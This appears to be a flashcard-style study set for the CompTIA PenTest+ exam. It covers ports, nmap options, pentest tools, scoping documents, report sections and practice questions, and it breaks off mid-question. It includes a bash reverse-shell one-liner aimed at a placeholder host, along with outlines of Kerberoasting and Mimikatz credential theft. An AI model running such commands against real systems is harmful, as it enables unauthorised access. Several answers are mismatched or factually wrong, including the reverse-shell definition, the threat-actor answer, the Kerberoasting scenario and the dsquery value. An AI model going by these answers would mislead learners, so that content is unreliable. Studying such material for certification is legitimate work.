Comptia Pentest

CVSS score rating.

0.0 receives a None rating 0.1-3.9 score gets a Low severity rating 4.0-6.9 is a Medium rating 7.0-8.9 is a High rating 9.0-10.0 is a Critical rating.

NBTSTAT identifies NetBIOS workstations with an ID

00

three important post-engagement cleanup activities

1.Removing any shells installed on systems during the penetration test. 2.Removing any tester-created accounts, credentials, or backdoors that were installed during testing. 3.Removing any tools that were installed during testing.

Kerberoasting is a four-step process

1.Scan Active Directory for user accounts with service principal names (SPNs) set. 2.Request service tickets using the SPNs. 3.Extract the service tickets from memory and save to a file. 4.Conduct an offline brute-force attack against the passwords in the service tickets.

RPC (Remote Procedure Call)

135 TCP

NetBIOS (Network Basic Input/Output System)

137-139, TCP/UDP

MSSQL

1433 TCP

SNMP (Simple Network Management Protocol)

161, 162 UDP

NBTSTAT identifies NetBIOS servers with an ID of

20

NFS (Network File System)

2049 TCP / UDP

MySQL

3306 TCP

RDP (Remote Desktop Protocol)

3389 TCP

LDAP (Lightweight Directory Access Protocol)

389 TCP/UDP

SMB (Server Message Block)

445 TCP

DHCP (Dynamic Host Configuration Protocol)

67 UDP

VMWARE SERVER

902 TCP

Which support resource details an organization's network or software design and infrastructure as well as defines the relationships between those elements? A. Architecture diagram B. WADL C. XSD D. Engagement scope

A . An architecture diagram details an organization's network or software design and infrastructure and defines the relationships between the elements thereof. B , C , and D are incorrect. B is incorrect because WADL (or Web Application Description Language) is a machine-readable XML description of HTTP-based web services. C is incorrect because an XSD (or Extensible Scheme Definition) serves to formally describe the elements made up in an XML document. D is incorrect because an engagement's scope is often detailed as part of the ROE of a penetration test, explicitly declaring hosts, networks, and subnets as being in or out of scope.

You are scoping a black box penetration test for a client. The goal is to see whether you can gain access to the information stored on an internal database server. Which information should the client provide you with prior to starting the test?

A black box penetration test should simulate the view an external attacker would have of the network. Therefore, the tester should have little or no knowledge of the internal network.

assessment is designed to test a specific aspect of an organization's security.

A goal-based

is usually conducted on an organization prior to it merging with another.

A premerger test

bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1

A reverse shell opens a communication channel on a port and waits for incoming connections. The client's machine acts as a server and initiates a connection to the tester's machine

defines what work will be done during an engagement,is a document that defines the purpose of the test, what tests will be done, what will be created, the timeline for the test to be completed, the price for the testing, and any additional terms and conditions. is an agreement that should be defined during the planning and scoping phase of a penetration test. It contains a working agreement between the penetration tester and the client that identifies specific techniques, tools, activities, deliverables, and schedules for the test. It may be used in conjunction with an existing master services agreement (MSA).

A statement of work (SOW)

can be used to perform fuzzing on an application as part of software assurance.

AFL and Peach

can be used to debug or even decompile an Android executable.

APK Studio and APKX

A penetration tester has been asked by a client to imitate a recently laid-off help desk technician. What best describes the abilities of a threat actor?

Advanced persistent threat (APT) An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren't monitored for or detected by the client's systems, the findings should include information that can help them design around this potential problem.

-T4

Aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target's IT staff.

A client has asked you to run a white box penetration test. The goal is to assess the security of several PC applications that were written in-house using the C++ programming language. These applications are used on a day-to-day basis by employees to manage orders, inventory, and payouts. During the scoping process, you determine that it would be helpful if you had access to the organization's internal software development documentation for these applications. Which of the following should you ask your client for? (Choose two.)

Application programming interface (API) documentation describes how software components communicate. Software development kits (SDKs) also come with documentation. Organizations may create their own SDKs, use commercial SDKs, or use open source SDKs. Understanding which SDKs are in use and where they are can help a penetration tester test applications, especially those written in-house.

This is the process of signing off the final report stating that the data in the report is correct, and those tasks have been performed. Captured sensitive plaintext data in transit Live demonstration of SQL injection, Screenshot of your access to sensitive and confidential data Copy of confidential data that you obtained during penetration testing Breaking of simple passwords, which could be through brute-force or dictionary attacks

Attestation of Findings

A swagger document is intended to serve what purpose? A. To describe functionality offering through a web service B. To provide API descriptions and test cases C. To offer simulated testing scenarios, allow inspection and debugging of requests, or possibly uncover undocumented APIs D. To elaborate on the framework in use for development of a software application

B . Swagger is an open source software development framework used for RESTful web services; swagger documentation provides API descriptions and sample test cases for their use. Swagger (OpenAPI) documentation: Swagger is a modern framework of API documentation and development that is now the basis of the OpenAPI Specification (OAS). Swagger documents can be extremely beneficial when testing APIs. A , C , and D are incorrect. A (the support resource that describes the functionality offered through a web service) refers to WSDL. C (simulated testing scenarios, inspection, and debugging of requests, and the revealing of undocumented APIs) refers to sample application requests. D (documentation used to elaborate on the framework used in the development of the software application) refers to software development kits, or SDKs.

can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.

Both IDA and Hopper

open source penetration testing utility designed to conduct social engineering exploits. provides an automated toolkit for using social engineering to take over a client's web browser. The tester can then use various phishing and social engineering techniques to get employees to visit the site.

Browser Exploitation Framework (BeEF)

You are a performance tester, and you are discussing performing compliance-based assessments for a client. Which is an important key consideration?

Budgeting is a key factor of the business process of penetration testing. A budget is required to complete a penetration test and is determined by the scope of the test and the rules of engagement. For internal penetration testers, a budget may just involve the allotted time for the team to perform testing. For external testers, a budget usually starts with the estimated number of hours based on the intricacy of the testing, the size of the team, and any associated costs.

Based on the description provided, what type of support document has been provided by the client? A. WADL file B. SDK documentation C. Architecture diagram D. SOAP project file

C . "Illustrations that detail the design of the client network" is a phrase that best describes an architecture diagram. A , B , and D are incorrect. A is incorrect because WADL (Web Application Description Language) is a machine-readable XML description of HTTP-based web services. B is incorrect because SDK (software development kit) documentation is used to elaborate on the framework used in the development of the software application. D is incorrect because a SOAP (Simple Object Access Protocol) project file is a support resource that details how messages are sent and received by a given web service.

configured to crawl the target organization's website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack. is a Ruby application that allows a tester to scour a website based on a URL and depth setting and then generate a wordlist from the files and web pages it finds.

CeWL

is a web-based tool that probes IP addresses across the Internet and then provides penetration testers with access to that information through a search engine.

Censys

How does Certificate pinning work?

Certificate pinning associates a host with an X.509 certificate (or a public key) and then uses that association to make a trust decision. You use certificate pinning to help prevent man-in-the-middle attacks. When communicating over public networks, it is important to send and receive information securely.

When planning for an engagement, which of the following are the most important? (Choose two.)

Company policies Tolerance to impact B and E. Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important, but this scenario is asking for the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

A. When creating your written report of findings after completing a penetration test, you should report your recommendations. including when you think the client should conduct follow-up penetration tests.

Conclusion

is a client-side security misconfiguration that allows a script running within a browser to write data to a client-side cookie.

Cookie manipulation

The function of which support resource is to define a format used for sending and receiving messages? A. WSDL B. XSD C. Architecture diagram D. SOAP project file

D . A SOAP (Simple Object Access Protocol) project file is a support resource that details how messages are sent and received by a given web service. A , B , and C are incorrect. A is incorrect because WSDL (Web Services Description Language) describes the functionality offered through a web service. B is incorrect because XSD is an XML (Extensible Markup Language) scheme definition that formally describes the elements made up in an XML document. C is incorrect because an architecture diagram is a map or illustration that represents the relationship between the various elements of an organization's network footprint or a piece of software.

the attacker exploits weaknesses in the victim's web browser. Typically, outdated browsers are most susceptible to this type of exploit. This is considered to be a client-side XSS attack.

DOM XSS

utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.

Dirbuster

has been allowed in the web server's configuration, then it could potentially expose the file system of the web server to users accessing the site in a web browser, including directories outside of the web server's root directory. For example, the Apache web server can be run in a chroot jail to prevent users from accessing directories outside of the web server's directories.

Directory transversal

is a framework for Android security assessments.

Drozer

is a free and open source network security tool for man-in-the-middle attacks on LAN

Ettercap

When creating your written report of findings after completing a penetration test, you should provide a high-level synopsis of the test and the results Typically, this is the first section of the report and is intended for less-technical audiences. . It should be written in a manner that conveys all of the important conclusions of the report in a clear manner that is written in layman's terms. A tester should explain what was discovered in plain language and describe the risks to the business in terms that the client will understand.

Executive Summary

U.S. government security standard that certifies cryptographic modules.

FIPS 140-2

A. findings will usually be constrained by the client's risk appetite. For example, an organization with a higher-risk appetite may want you to only include information about high-risk or critical-risk vulnerabilities. Provide all the technical details necessary that teams like IT, information security, and development need to use the report to address the issues found in the testing phase

Findings and Recommendation

can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.

Findsecbugs and Yet Another Source Code Analyzer (YASCA)

is an open source research source that is published by the same organization that produces the nmap utility. It can be accessed at www.seclists.org/fulldisclosure.

Full Disclosure

occurs when either the client or the tester decides to change the focus of the penetration test from the agreed upon scope after the test has already started. In this scenario, a black box component has been added to a traditional gray box test.

Goal reprioritization

command-line tool that allows testers to generate network traffic. is popular because it allows you to create custom packets. In this scenario, you will be sending TCP SYNs to TCP port 80. The -S switch asks to send SYN traffic, the -V switch is verbose mode, and the -p switch indicates the port.

HPING

The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.

Hydra and Medusa

a penetration test is conducted on an organization's vendors to ensure their networks are secure and can't be used as a pivot point to compromise the organization itself.

In a supply chain assessment

You are scoping a white box penetration test for a client. The goal is to see whether you can gain access to confidential research data stored on an internal database server. You want to target an internally developed data collection application that the client's end users use on a daily basis to catalog and store information in the database. Which information should the client provide you with prior to starting the test?

In a white box test, you should have access to extensive internal documentation. Because an in-house developed application will be used as the attack vector, you should require the client to provide as much documentation about that application as possible. For example, you should ask for architectural diagrams, sample application requests, and the swagger document, as applicable.

-T5

Insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target's IT staff.

the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims' traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim's traffic and capture sensitive information.

Karma attack

involves running the value to be hashed through the hash function multiple times. This increases the computation time required to hash each password, but it also dramatically increases the size of rainbow table needed for a precomputation attack to work.

Key stretching

is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system

Kismet

When planning for an engagement, which of the following are the most important? (Choose two.)

Knowing the company policies and their tolerance to impact are two of the most important items needed to know when planning for an engagement. The others are important, but this scenario is asking for the two most important. Cybersecurity professionals widely agree that vulnerability management is a critical component of any information security program, and for this reason, many organizations mandate vulnerability scanning in corporate policy, even if that is not a regulatory requirement. The risk and impact tolerance of the organization being assessed should be used to define the scope and rules of engagement for the assessment.

Microsoft tool that manages administrative credentials. It is for randomizing local administrator account credentials using Active Directory

Local Administrator Password Solution (LAPS)

tester was able to compromise a single workstation and is able to move laterally through the network

MFA, Password complexity, Full disk Encryption

is a commercial product that assists with the visualization of data gathered from OSINT efforts.

Maltego

A. When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test In this example, you would inform the reader that you used the EC-Council's CEH XXXXXXX

Methodology

When creating your written report of findings after completing a penetration test, you should identify the standard or guidelines you used to conduct the test in the

Methodology section

When creating your written report of findings after completing a penetration test, you should report your risk ratings in the allow the reader to prioritize risks as well as make comparisons between penetration tests conducted over time.

Metrics and Measures

be used to compromise Kerberos-based authentication systems, including generating "golden" and "silver" Kerberos tickets. is an open source utility that enables the viewing of credential information from the Windows Local Security Authority Subsystem Service (LSASS) using its sekurlsa module, which includes plaintext passwords and Kerberos tickets, which can then be used for attacks such as pass-the-hash and pass-the-ticket attacks Can not be used "over the wire."

Mimikatz

usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.

Nikto

is a set of security controls that businesses are required to implement to protect credit card data. For example, two of the requirements specify that the organization must monitor and audit all access to cardholder data and that access to that data must be restricted on a need-to-know basis. For example, one of the requirements specifies that a strong password policy be in place within the organization. one of the requirements specifies that antivirus software be installed on all systems and that it must be updated regularly. two of the requirements specify that all cardholder data be encrypted before being transmitted on a network medium and that all default passwords be removed from hardware and software deployed. two of the requirements specify that the organization must restrict physical access to all cardholder data and that the CDE network be isolated from the rest of the network. standard requires that organizations that handle credit card processing conduct both internal and external penetration tests at least once per year. They can perform them more frequently, if desired, but they are not required to. These organizations must also conduct penetration testing after they make a significant change to the network infrastructure.

PCI-DSS

What HTTP content method is more secure than get?

POST

-T0

Paranoid mode. in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.

used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.

Patator and Aircrack-ng

occurs when an intruder tags along with one or more authorized people through a physical barrier, such as a locking door or a turnstile. This happens without the authorized person's knowledge or consent.

Piggybacking

-T2

Polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

is a tool designed to allow penetration testers to run programs on remote systems via SMB on port 445. That makes it an extremely useful tool. ability to run processes remotely requires that both the local and remote computers have file and print sharing (i.e., the Workstation and Server services) enabled and the default Admin$ share, which is a hidden share that maps to the \windows directory.

PsExec

the penetration tester captures the RFID signature from a legitimate RFID device and then copies it to a fake device. This is commonly done to copy an RFID access badge.

RFID cloning

usually more targeted than normal penetration tests, act like an attacker by targeting sensitive data or systems with the goal of acquiring data and access, not intended to provide details of all the security flaws that a target has,can be useful as a security exercise to train incident responders or to help validate security designs and practices.

Red team assessments

is used on Windows systems and allows you to remotely execute code on a different Windows system.

Remote Procedure Call (RPC)/Distributed Component Object Model (DCOM)

a toolkit that is used to answer NetBIOS queries from Windows systems on a network.

Responder

Leveraging an open SMTP service to send unauthorized email messages is called xxxxx. Most new systems have provisions in place to prevent this from happening, but many older server systems do not.

SMTP relay

A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client?

SOAP

A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client?

SOAP is an API standard that relies on XML and related schemas. XML-based specifications are governed by XML Schema Definition (XSD) documents. Having a good reference of what a specific API supports can be valuable for a penetration tester. This question specifically asks about XML files, so the SOAP project files would be the most beneficial.

Application programming interface (API) documentation: This includes documentation such as the following:

SOAP, SWAGGER, WSDL, WADL, SDK, SOURCE CODE ACCESS, EXAMPLES OF APPLICATION REQUEST, SYSTEM AND NETWORK ARCHITECTURAL DIAGRAMS

a user sends an HTTPS request to a web server. This is done to ensure that communications between the server and the browser are encrypted. However, the exploit fools the web server into thinking the user wants a standard HTTP connection, and an unencrypted session is established. Unless the user is watching carefully, the user may not realize that this has happened.

SSL stripping attack

the hash involves adding extra, random data to a hashing operation. This mechanism is commonly used to protect hashed passwords from being reverse-hashed (which would expose the plain text password).

Salting

You are planning on setting up a security assessment. Which of the following has a major impact on the budget of the assessment?

Scoping The first step in most penetration testing engagements is determining what should be tested, often called the scope of the assessment. The scope of the assessment determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

is a specialized search engine to provide discovery of vulnerable Internet of Things (IoT) devices from public sources.

Shodan

popular security search engine and provides prebuilt searches as well as categories of search for industrial control systems, databases, and other common search queries. is a search engine that lets the user find specific types of computers and devices that are connected to the Internet using a variety of filters. Some have described it as a search engine of service banners, which are metadata that the server sends back to the client. Using for penetration testing requires some basic knowledge of banners including HTTP status codes.

Shodan

A security analyst is attempting to construct specialized XML files to test the security of the parsing functions of a Windows application during testing. Before starting to test the application, which of the following should the analyst request from the client?

Software development kit (SDK) for specific applications Software development kit (SDK) for specific applications: An SDK, or devkit, is a collection of software development tools that can be used to interact and deploy a software framework, an operating system, or a hardware platform. SDKs can also help pen testers understand certain specialized applications and hardware platforms within the organization being tested.

is the most dangerous type of cross-site scripting. Web applications that allow users to store data are potentially exposed to this type of attack. Occurs when a web application gathers input from a user which might be malicious and then stores that input in a data store for later use

Stored cross-site scripting (XSS)

is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services. REST is an alternative to the SOAP protocol. In fact, REST has started to replace SOAP as the framework of choice in most modern web applications.. It also specifies the list of parameters to an operation, including the name and type of the parameters, whether the parameters are required or optional, and information about acceptable values for those parameters. So, access to a this document provides testers with a good view of how the API works and thus how they can test it.

Swagger

Which of the following is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services?

Swagger is an open source framework designed to help developers design, build, document, and test Representational State Transfer (REST) web services. REST is an alternative to the SOAP protocol. In fact, REST has started to replace SOAP as the framework of choice in most modern web applications.

occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person's knowledge and/or consent.

Tailgating

People

Technical Controls, Leadership, Reminders

Processes

Technical Controls, Leadership, Return on Investment

contains information about recent security updates released by software and hardware vendors and a description of the vulnerabilities they are intended to address.

The CERT database

database is a community-developed resource. The database contains a catalog of commonly used cyber attack patterns.

The Common Attack Pattern, Enumeration and Classification (CAPEC)

database contains a list of publicly known cybersecurity vulnerabilities. Whenever a vendor anywhere in the world discovers a vulnerability with their product, they add an entry to the database. The goal is to make a common resource that everyone can use, instead of each individual vendor maintaining their own database containing just vulnerabilities associated with their products.

The Common Vulnerabilities and Exposures (CVE)

is an industry standard for assessing the severity of security vulnerabilities. It provides a technique for scoring each vulnerability on a variety of measures. Security analysts often use ratings to prioritize response actions. Each measure is given a descriptive rating and a numeric score.

The Common Vulnerability Scoring System (CVSS)

database contains a list of publicly known cybersecurity vulnerabilities associated with software in general instead of a specific product.

The Common Weakness and Enumeration (CWE)

is implemented in motherboards made by some manufacturers for diagnostic and testing purposes. With the right equipment, a penetration tester can connect to this port and capture data directly from the running motherboard.

The JTAG port

is loosely based on the DNS packet format and allows IPv4 and IPv6 hosts to perform name resolution for other hosts on the same local network without a DNS server. It is supported by both Windows and Linux hosts. protocol has many security vulnerabilities that can be exploited in a penetration test. For example, it lacks security controls such as authentication. Because of this, a malicious host on the network can advertise itself as any host it wants to.

The LLMNR protocol

is maintained by the U.S. government's National Institute of Science and Technology provides a summary of current security vulnerabilities ranked by their severity.

The National Vulnerability Database (NVD)

is used on Windows systems to display the graphical desktop of a remote Windows host on the local system over a network connection. It provides full point-and-click interactivity. It can even be used to transmit sounds from the remote system to the local system and to share files between systems.

The Remote Desktop Protocol (RDP)

web application architecture is based on the Hypertext Transfer Protocol (HTTP).

The Representational State Transfer (REST)

Which of the following protocols is the Representational State Transfer (REST) web application architecture based on?

The Representational State Transfer (REST) web application architecture is based on the Hypertext Transfer Protocol (HTTP).

hashed passwords for local accounts. It is located in C:\Windows\System32\config\ by default. If a copy of this file can be made, it can be cracked using a number of different tools available on the Internet to expose the passwords it contains.

The SAM database

sets standards for publicly traded U.S. companies with respect to security policies, standards, and controls. For example, it sets standards for network access, authentication, and security.

The Sarbanes-Oxley act

is a messaging protocol specification that defines how structured information can be exchanged between web applications. can be created from Web Services Description Language (WSDL) files.

The Simple Object Access Protocol (SOAP)

Which of the following is a messaging protocol specification that defines how structured information can be exchanged between web applications and is created from WSDL files?

The Simple Object Access Protocol (SOAP) is a messaging protocol specification that defines how structured information can be exchanged between web applications. SOAP project files can be created from Web Services Description Language (WSDL) files.

is an XML-based machine-readable description of HTTP-based web services. As such, it is typically used with REST services instead of SOAP.

The Web Application Description Language (WADL)

provides an XML-based description of HTTP-based web services running on a web application server. typically used with Representational State Transfer (REST) web services. alternative to WSDL and is generally considered easier to use but also lacks the flexibility associated with WSDL.

The Web Application Description Language (WADL)

A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications are based on Representational State Transfer (REST) architecture. During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?

The Web Application Description Language (WADL) is an XML-based machine-readable description of HTTP-based web services. As such, it is typically used with REST services instead of SOAP.

Which of the following architectures is used to provide an XML-based description of HTTP-based web services running on a web application server and is commonly used with Representational State Transfer (REST) web applications?

The Web Application Description Language (WADL) provides an XML-based description of HTTP-based web services running on a web application server. WADL is typically used with Representational State Transfer (REST) web services. WADL is an alternative to WSDL and is generally considered easier to use but also lacks the flexibility associated with WSDL.

is an XML-based interface definition language that is used to describe the functionality offered by a web application server, such as a SOAP server.doesn't work well with the Representational State Transfer (REST) web application architecture, which has been slowly replacing SOAP over the years.

The Web Service Description Language (WSDL)

Which of the following is an XML-based interface definition language used to describe the functionality offered by a Simple Object Access Protocol (SOAP) server?

The Web Service Description Language (WSDL) is an XML-based interface definition language that is used to describe the functionality offered by a web application server, such as a SOAP server. WSDL doesn't work well with the Representational State Transfer (REST) web application architecture, which has been slowly replacing SOAP over the years.

W3C specification that identifies how to define elements within an XML document.

The XLM Schema Definition (XSD)

Which of the following is a World Wide Web Consortium (W3C) specification that identifies how to define elements within an XML document?

The XLM Schema Definition (XSD) is a W3C specification that identifies how to define elements within an XML document.

The first step in most penetration testing engagements is determining what should be tested. determines what penetration testers will do and how their time will be spent. Thus, this is a major impact on the budget of an assessment.

The scope of the assessment

A junior technician in an organization's IT department runs a penetration test on a corporate web application. During testing, the technician discovers that the application can disclose a SQL table with all user account and password information. How should the technician notify management?

The technician should request that management create a request for proposal (RFP) to begin a formal engagement with a professional penetration testing company. In this scenario, since the testing was performed by an on-staff junior administrator, it may be in the company's best interest to create a request for proposal (RFP) from a professional penetration testing company to agree with the assessments and to give the company any vulnerability findings. An RFP is a document that solicits proposal, often made through a bidding process.

You are a penetration tester and looking at performing a Kerberoasting attack. Given the following situations, in which one would you perform a Kerberoasting attack?

The tester compromised an account and needs to dump hashes and plaintext passwords from the system

The rules of engagement include the following:

The timeline when testing will be conducted What locations, systems, applications, and other potential targets are to be included/excluded The data handling requirements for information gathered What behaviors to expect from the target What resources are committed to the test Any legal concerns that should be addressed The when/how communication will occur Who to contact in case of events Who is permitted to engage in the penetration testing team

-iL

This is the input from list of hosts/networks

-sV

This probes open ports to determine service/version info.

TFTP (Trivial File Transfer Protocol)

UDP 69

The SNMP protocol runs on

UDP port 161

You are scoping an upcoming white box penetration test with a new client. Their network employs network access control (NAC) using IPSec. Which technique will your penetration testers need to use to enable them to access the secure internal network protected by NAC?

Usually, when NAC is implemented with IPSec, network devices (such as desktops and laptops) must meet company security policies before they are allowed to connect to the internal secure network. If they do, they are assigned a digital certificate that allows them to communicate with other systems on the internal secure network. Otherwise, they are placed on an isolated remediation network until they come into compliance. To bypass NAC, certificate pinning can be used to assign a digital certificate to the testers' systems without proving they are in compliance every time they connect.

Technology

Vulnerability Scans, Pentesting, 80/20 Rule, Technology Solutions

A client has asked you to run a white box penetration test. The goal is to assess the security of their web-based applications. These applications leverage the Simple Object Access Protocol (SOAP). During the scoping process, you determine that it would be helpful if you had access to the organization's internal documentation for these applications. Which of the following should you ask your client for?

Web Services Description Language (WSDL) is an XML-based interface definition language used for describing the functionality offered by a SOAP service.

Ruby

When declaring a local variable, Ruby uses a syntax of _variable_name = value array_name = [value1, value2, value3, ...] array_name[position] _array_name = {"element_name" => "value"} if/else/end gets for input puts prints variable

is an infrastructure provided by Microsoft for centrally managing Windows systems over a network connection.

Windows Management Instrumentation

unsolicited messages are sent over a Bluetooth connection to wireless devices, such as a mobile phone. hacking method that allows an individual to send anonymous messages to Bluetooth-enabled devices within a certain radius. First, a hacker scans their surroundings with a Bluetooth-enabled device, searching for other devices. The hacker then sends an unsolicited message to the detected devices.

bluejacking

an unauthorized Bluetooth connection is established with a wireless device, such as a mobile phone. That connection is then used to steal information from that device.

bluesnarfing

is the name of the attribute that stores passwords in a Group Policy Preference item. Whenever a preference requires a user's password to be saved, it gets stored within this attribute in encrypted format. However, the password can be easily decrypted by any authenticated user in the domain.

cPassword

How to Bypass NAC?

certificate pinning can be used to assign a digital certificate to the testers' systems without proving they are in compliance every time they connect.

the tester adds transparent layers to a web page in an attempt to fool a user into clicking a hidden button or link on a transparent layer. This allows the tester to hijack user clicks and send them to a different website (such as a credential harvesting site).

clickjacking

Penetration testing was performed on an agreed-upon scope. After you have completed the scope of penetration testing, you need to obtain. Submit a formal report and get the client to agree with your findings

client acceptance

-p-

command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved

a fake website that looks like a legitimate website is used to capture victims' usernames and passwords. In the context of a wireless exploit, this could be accomplished using a fake captive portal that looks like a legitimate captive portal that captures victims' information.

credential harvesting

communication trigger happens when a penetration tester discovers a security vulnerability so serious that it must be addressed immediately instead of waiting until the test has been completed.

critical findings

Because the session cookie from the website was saved locally, the user is perpetually logged on to the site. Therefore, the HTTP request to change the user's password contained in the email message didn't require authentication to execute. The penetration tester can now log on to Active Directory as a high-level employee.

cross-site request forgery (CSRF).

an attacker embeds scripting commands on a website that will later be executed by an unsuspecting visitor accessing the site. The idea is to trick a user visiting a trusted site into executing malicious code placed there by an untrusted third party. In this scenario, the attacker has developed an application that will target web browsers and permit access to a user's banking information in the process, stealing money and transferring it to another account.

cross-site scripting (XSS) attack

the process of communicating between the client and the tester to determine whether an attack detected during a penetration test is coming from an authorized penetration tester or whether it is a real attack instigated by some third-party hacker.

de-confliction

the process of communicating between the client and the tester to cease exploits used during the penetration test because of the adverse effects they may be having on the network.

de-escalation

is designed to simply map out every system on the target network using very nonintrusive mechanisms (such as ping) to enumerate the network. Because of this, this type of scan is the least likely to be detected by an IDS or IPS device.

discovery scan

You are a penetration tester, and you have full access to a domain controller. You want to discover any user accounts that have not been active for the past 30 days. What command should you use?

dsquery user -inactive 4 Dsquery.exe is a command-line utility for finding information about various objects in the Active Directory domain. The utility is available in all Windows Server versions by default. The dsquery command allows you to query the LDAP directory to find objects that meet the specified criteria. As an attribute of the dsquery command, you need to specify the type of the AD object that you are searching for. In this scenario, you are looking for user accounts that have been inactive for the past 30 days, so you would use dsquery user -inactive < NumWeeks >.

-A

enables OS detection, service version detection, script scanning, and traceroute to the remote host.

They are used to gather and analyze digital evidence from a cyber crime scene.

foremost and FTK

a small amount of keying material is extracted from a captured packet. Then, an ARP packet is sent with known content to the access point. If the packet is echoed back by the AP, then even more keying information can be obtained from the returned packet. If this process is repeated over and over, the entire wireless key can be exposed.

fragmentation wireless attack

utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.

hashcat

collection of Python classes for working with network protocols. provides a wide range of tools, including the ability to authenticate with hashes once you have captured them. Metasploit's SMB capture mode, Responder, and Wireshark can all capture SMB hashes from broadcasts, but in this scenario, you also want the ability to authenticate with hashes once you've captured the messages.

impacket

The best way to defend against an SSL stripping attack is to

implement an HTTP Strict Transport Security (HSTS) policy that prevents a user's browser from opening a web page unless an HTTPS connection has been used to transfer the page from the web server to the client.

Alternatives to a SOW used by the U.S. federal government

include a statement of objectives (SOO) and a performance work statement (PWS). Purchase orders and a noncompete agreements are not typically used as alternatives to a SOW.

-v / -vv

increase verbosity level of scan output

communication trigger happens when a penetration tester discovers that the network or a system has already been compromised previously by another attacker. In this situation, the tester usually communicates the discovery with the client immediately instead of waiting until the test is complete.

indicator of prior compromise

The most important step in the penetration testing planning and scoping process

is to obtain written permission from the target to perform the test. Without written permission, you are considered a hacker and are subject to federal, state, and local laws regarding computer crime (such as U.S. Code, Title 18, Chapter 47, Sections 1029 and 1030).

the penetration tester transmits a radio signal in the 2.4 GHz and/or 5 GHz frequency ranges that is powerful enough to disrupt the legitimate wireless signal. This disruption prevents users from using the wireless network. As such, this exploit can be classified as a network stress test or denial-of-service attack.

jamming attack

-sL

lists the targets to scan and does a reverse-dns lookup

sets the overall provisions between two organizations. defines the terms that the organizations will use for work to be done in the future. This makes ongoing engagements and contracts much easier to work through. This can help organizations prevent the need to renegotiate. common when organizations anticipate working together over a period of time or when a support agreement is created.

master services agreement (MSA)

used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.

ncat

-sS

nmap utility to conduct a SYN port scan of the specified target system and SYN scan is the default used if no other scan type is specified. and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.

-sn

nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.

-n

no DNS resolution

legal document that is designed to protect the confidentiality of the client's data and other information that the penetration tester may encounter during the test.

nondisclosure agreement (NDA)

tools help identify the IP addresses associated with an organization. Recon-ng is a modular web reconnaissance framework that organizes and manages OSINT work.

nslookup

-T3

option is used by default. This tells nmap to scan in normal mode.

Hiring additional IT staff members who have experience with cyber security is an example of a.

people-based mitigation strategy

Conducting security awareness training with employees is an example of a

people-based mitigation strategy.

Implementing regular security awareness training for all employees is an example of a

people-based mitigation strategy.

Requiring IT staff members to pass a network security certification exam is an example of a

people-based mitigation strategy.

Forbidding employees from using external cloud-based services such as Google Drive is an example of a

process-based mitigation strategy

Implementing off-boarding processes for employees when they leave the organization is an example of a

process-based mitigation strategy.

Requiring multiple sign-offs on payouts is an example of a

process-based mitigation strategy.

allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.

proxychains

What is a purchase order?

purchase order is a binding agreement to make a purchase from a vendor. With a purchase order in place, your organization can justify spending time and money defining a SOW and an NDA for the engagement. Because the client is essentially "trying" your services, an MSA would not yet be required, although it may be in the future.

a precomputed table of hash values that can be used to reverse hash functions. For example, if a plaintext password has been protected by hashing it, you may be able to use a _______ to reverse the hashing function and expose the original plaintext password.

rainbow table

A penetration tester is running a phishing test and receives a shell from an internal computer that is running the Windows 10 operating system. The tester decides that he wants to use Mimikatz to perform credential harvesting. The tester wants to allow for credential caching. Which of the following registry changes would allow this?

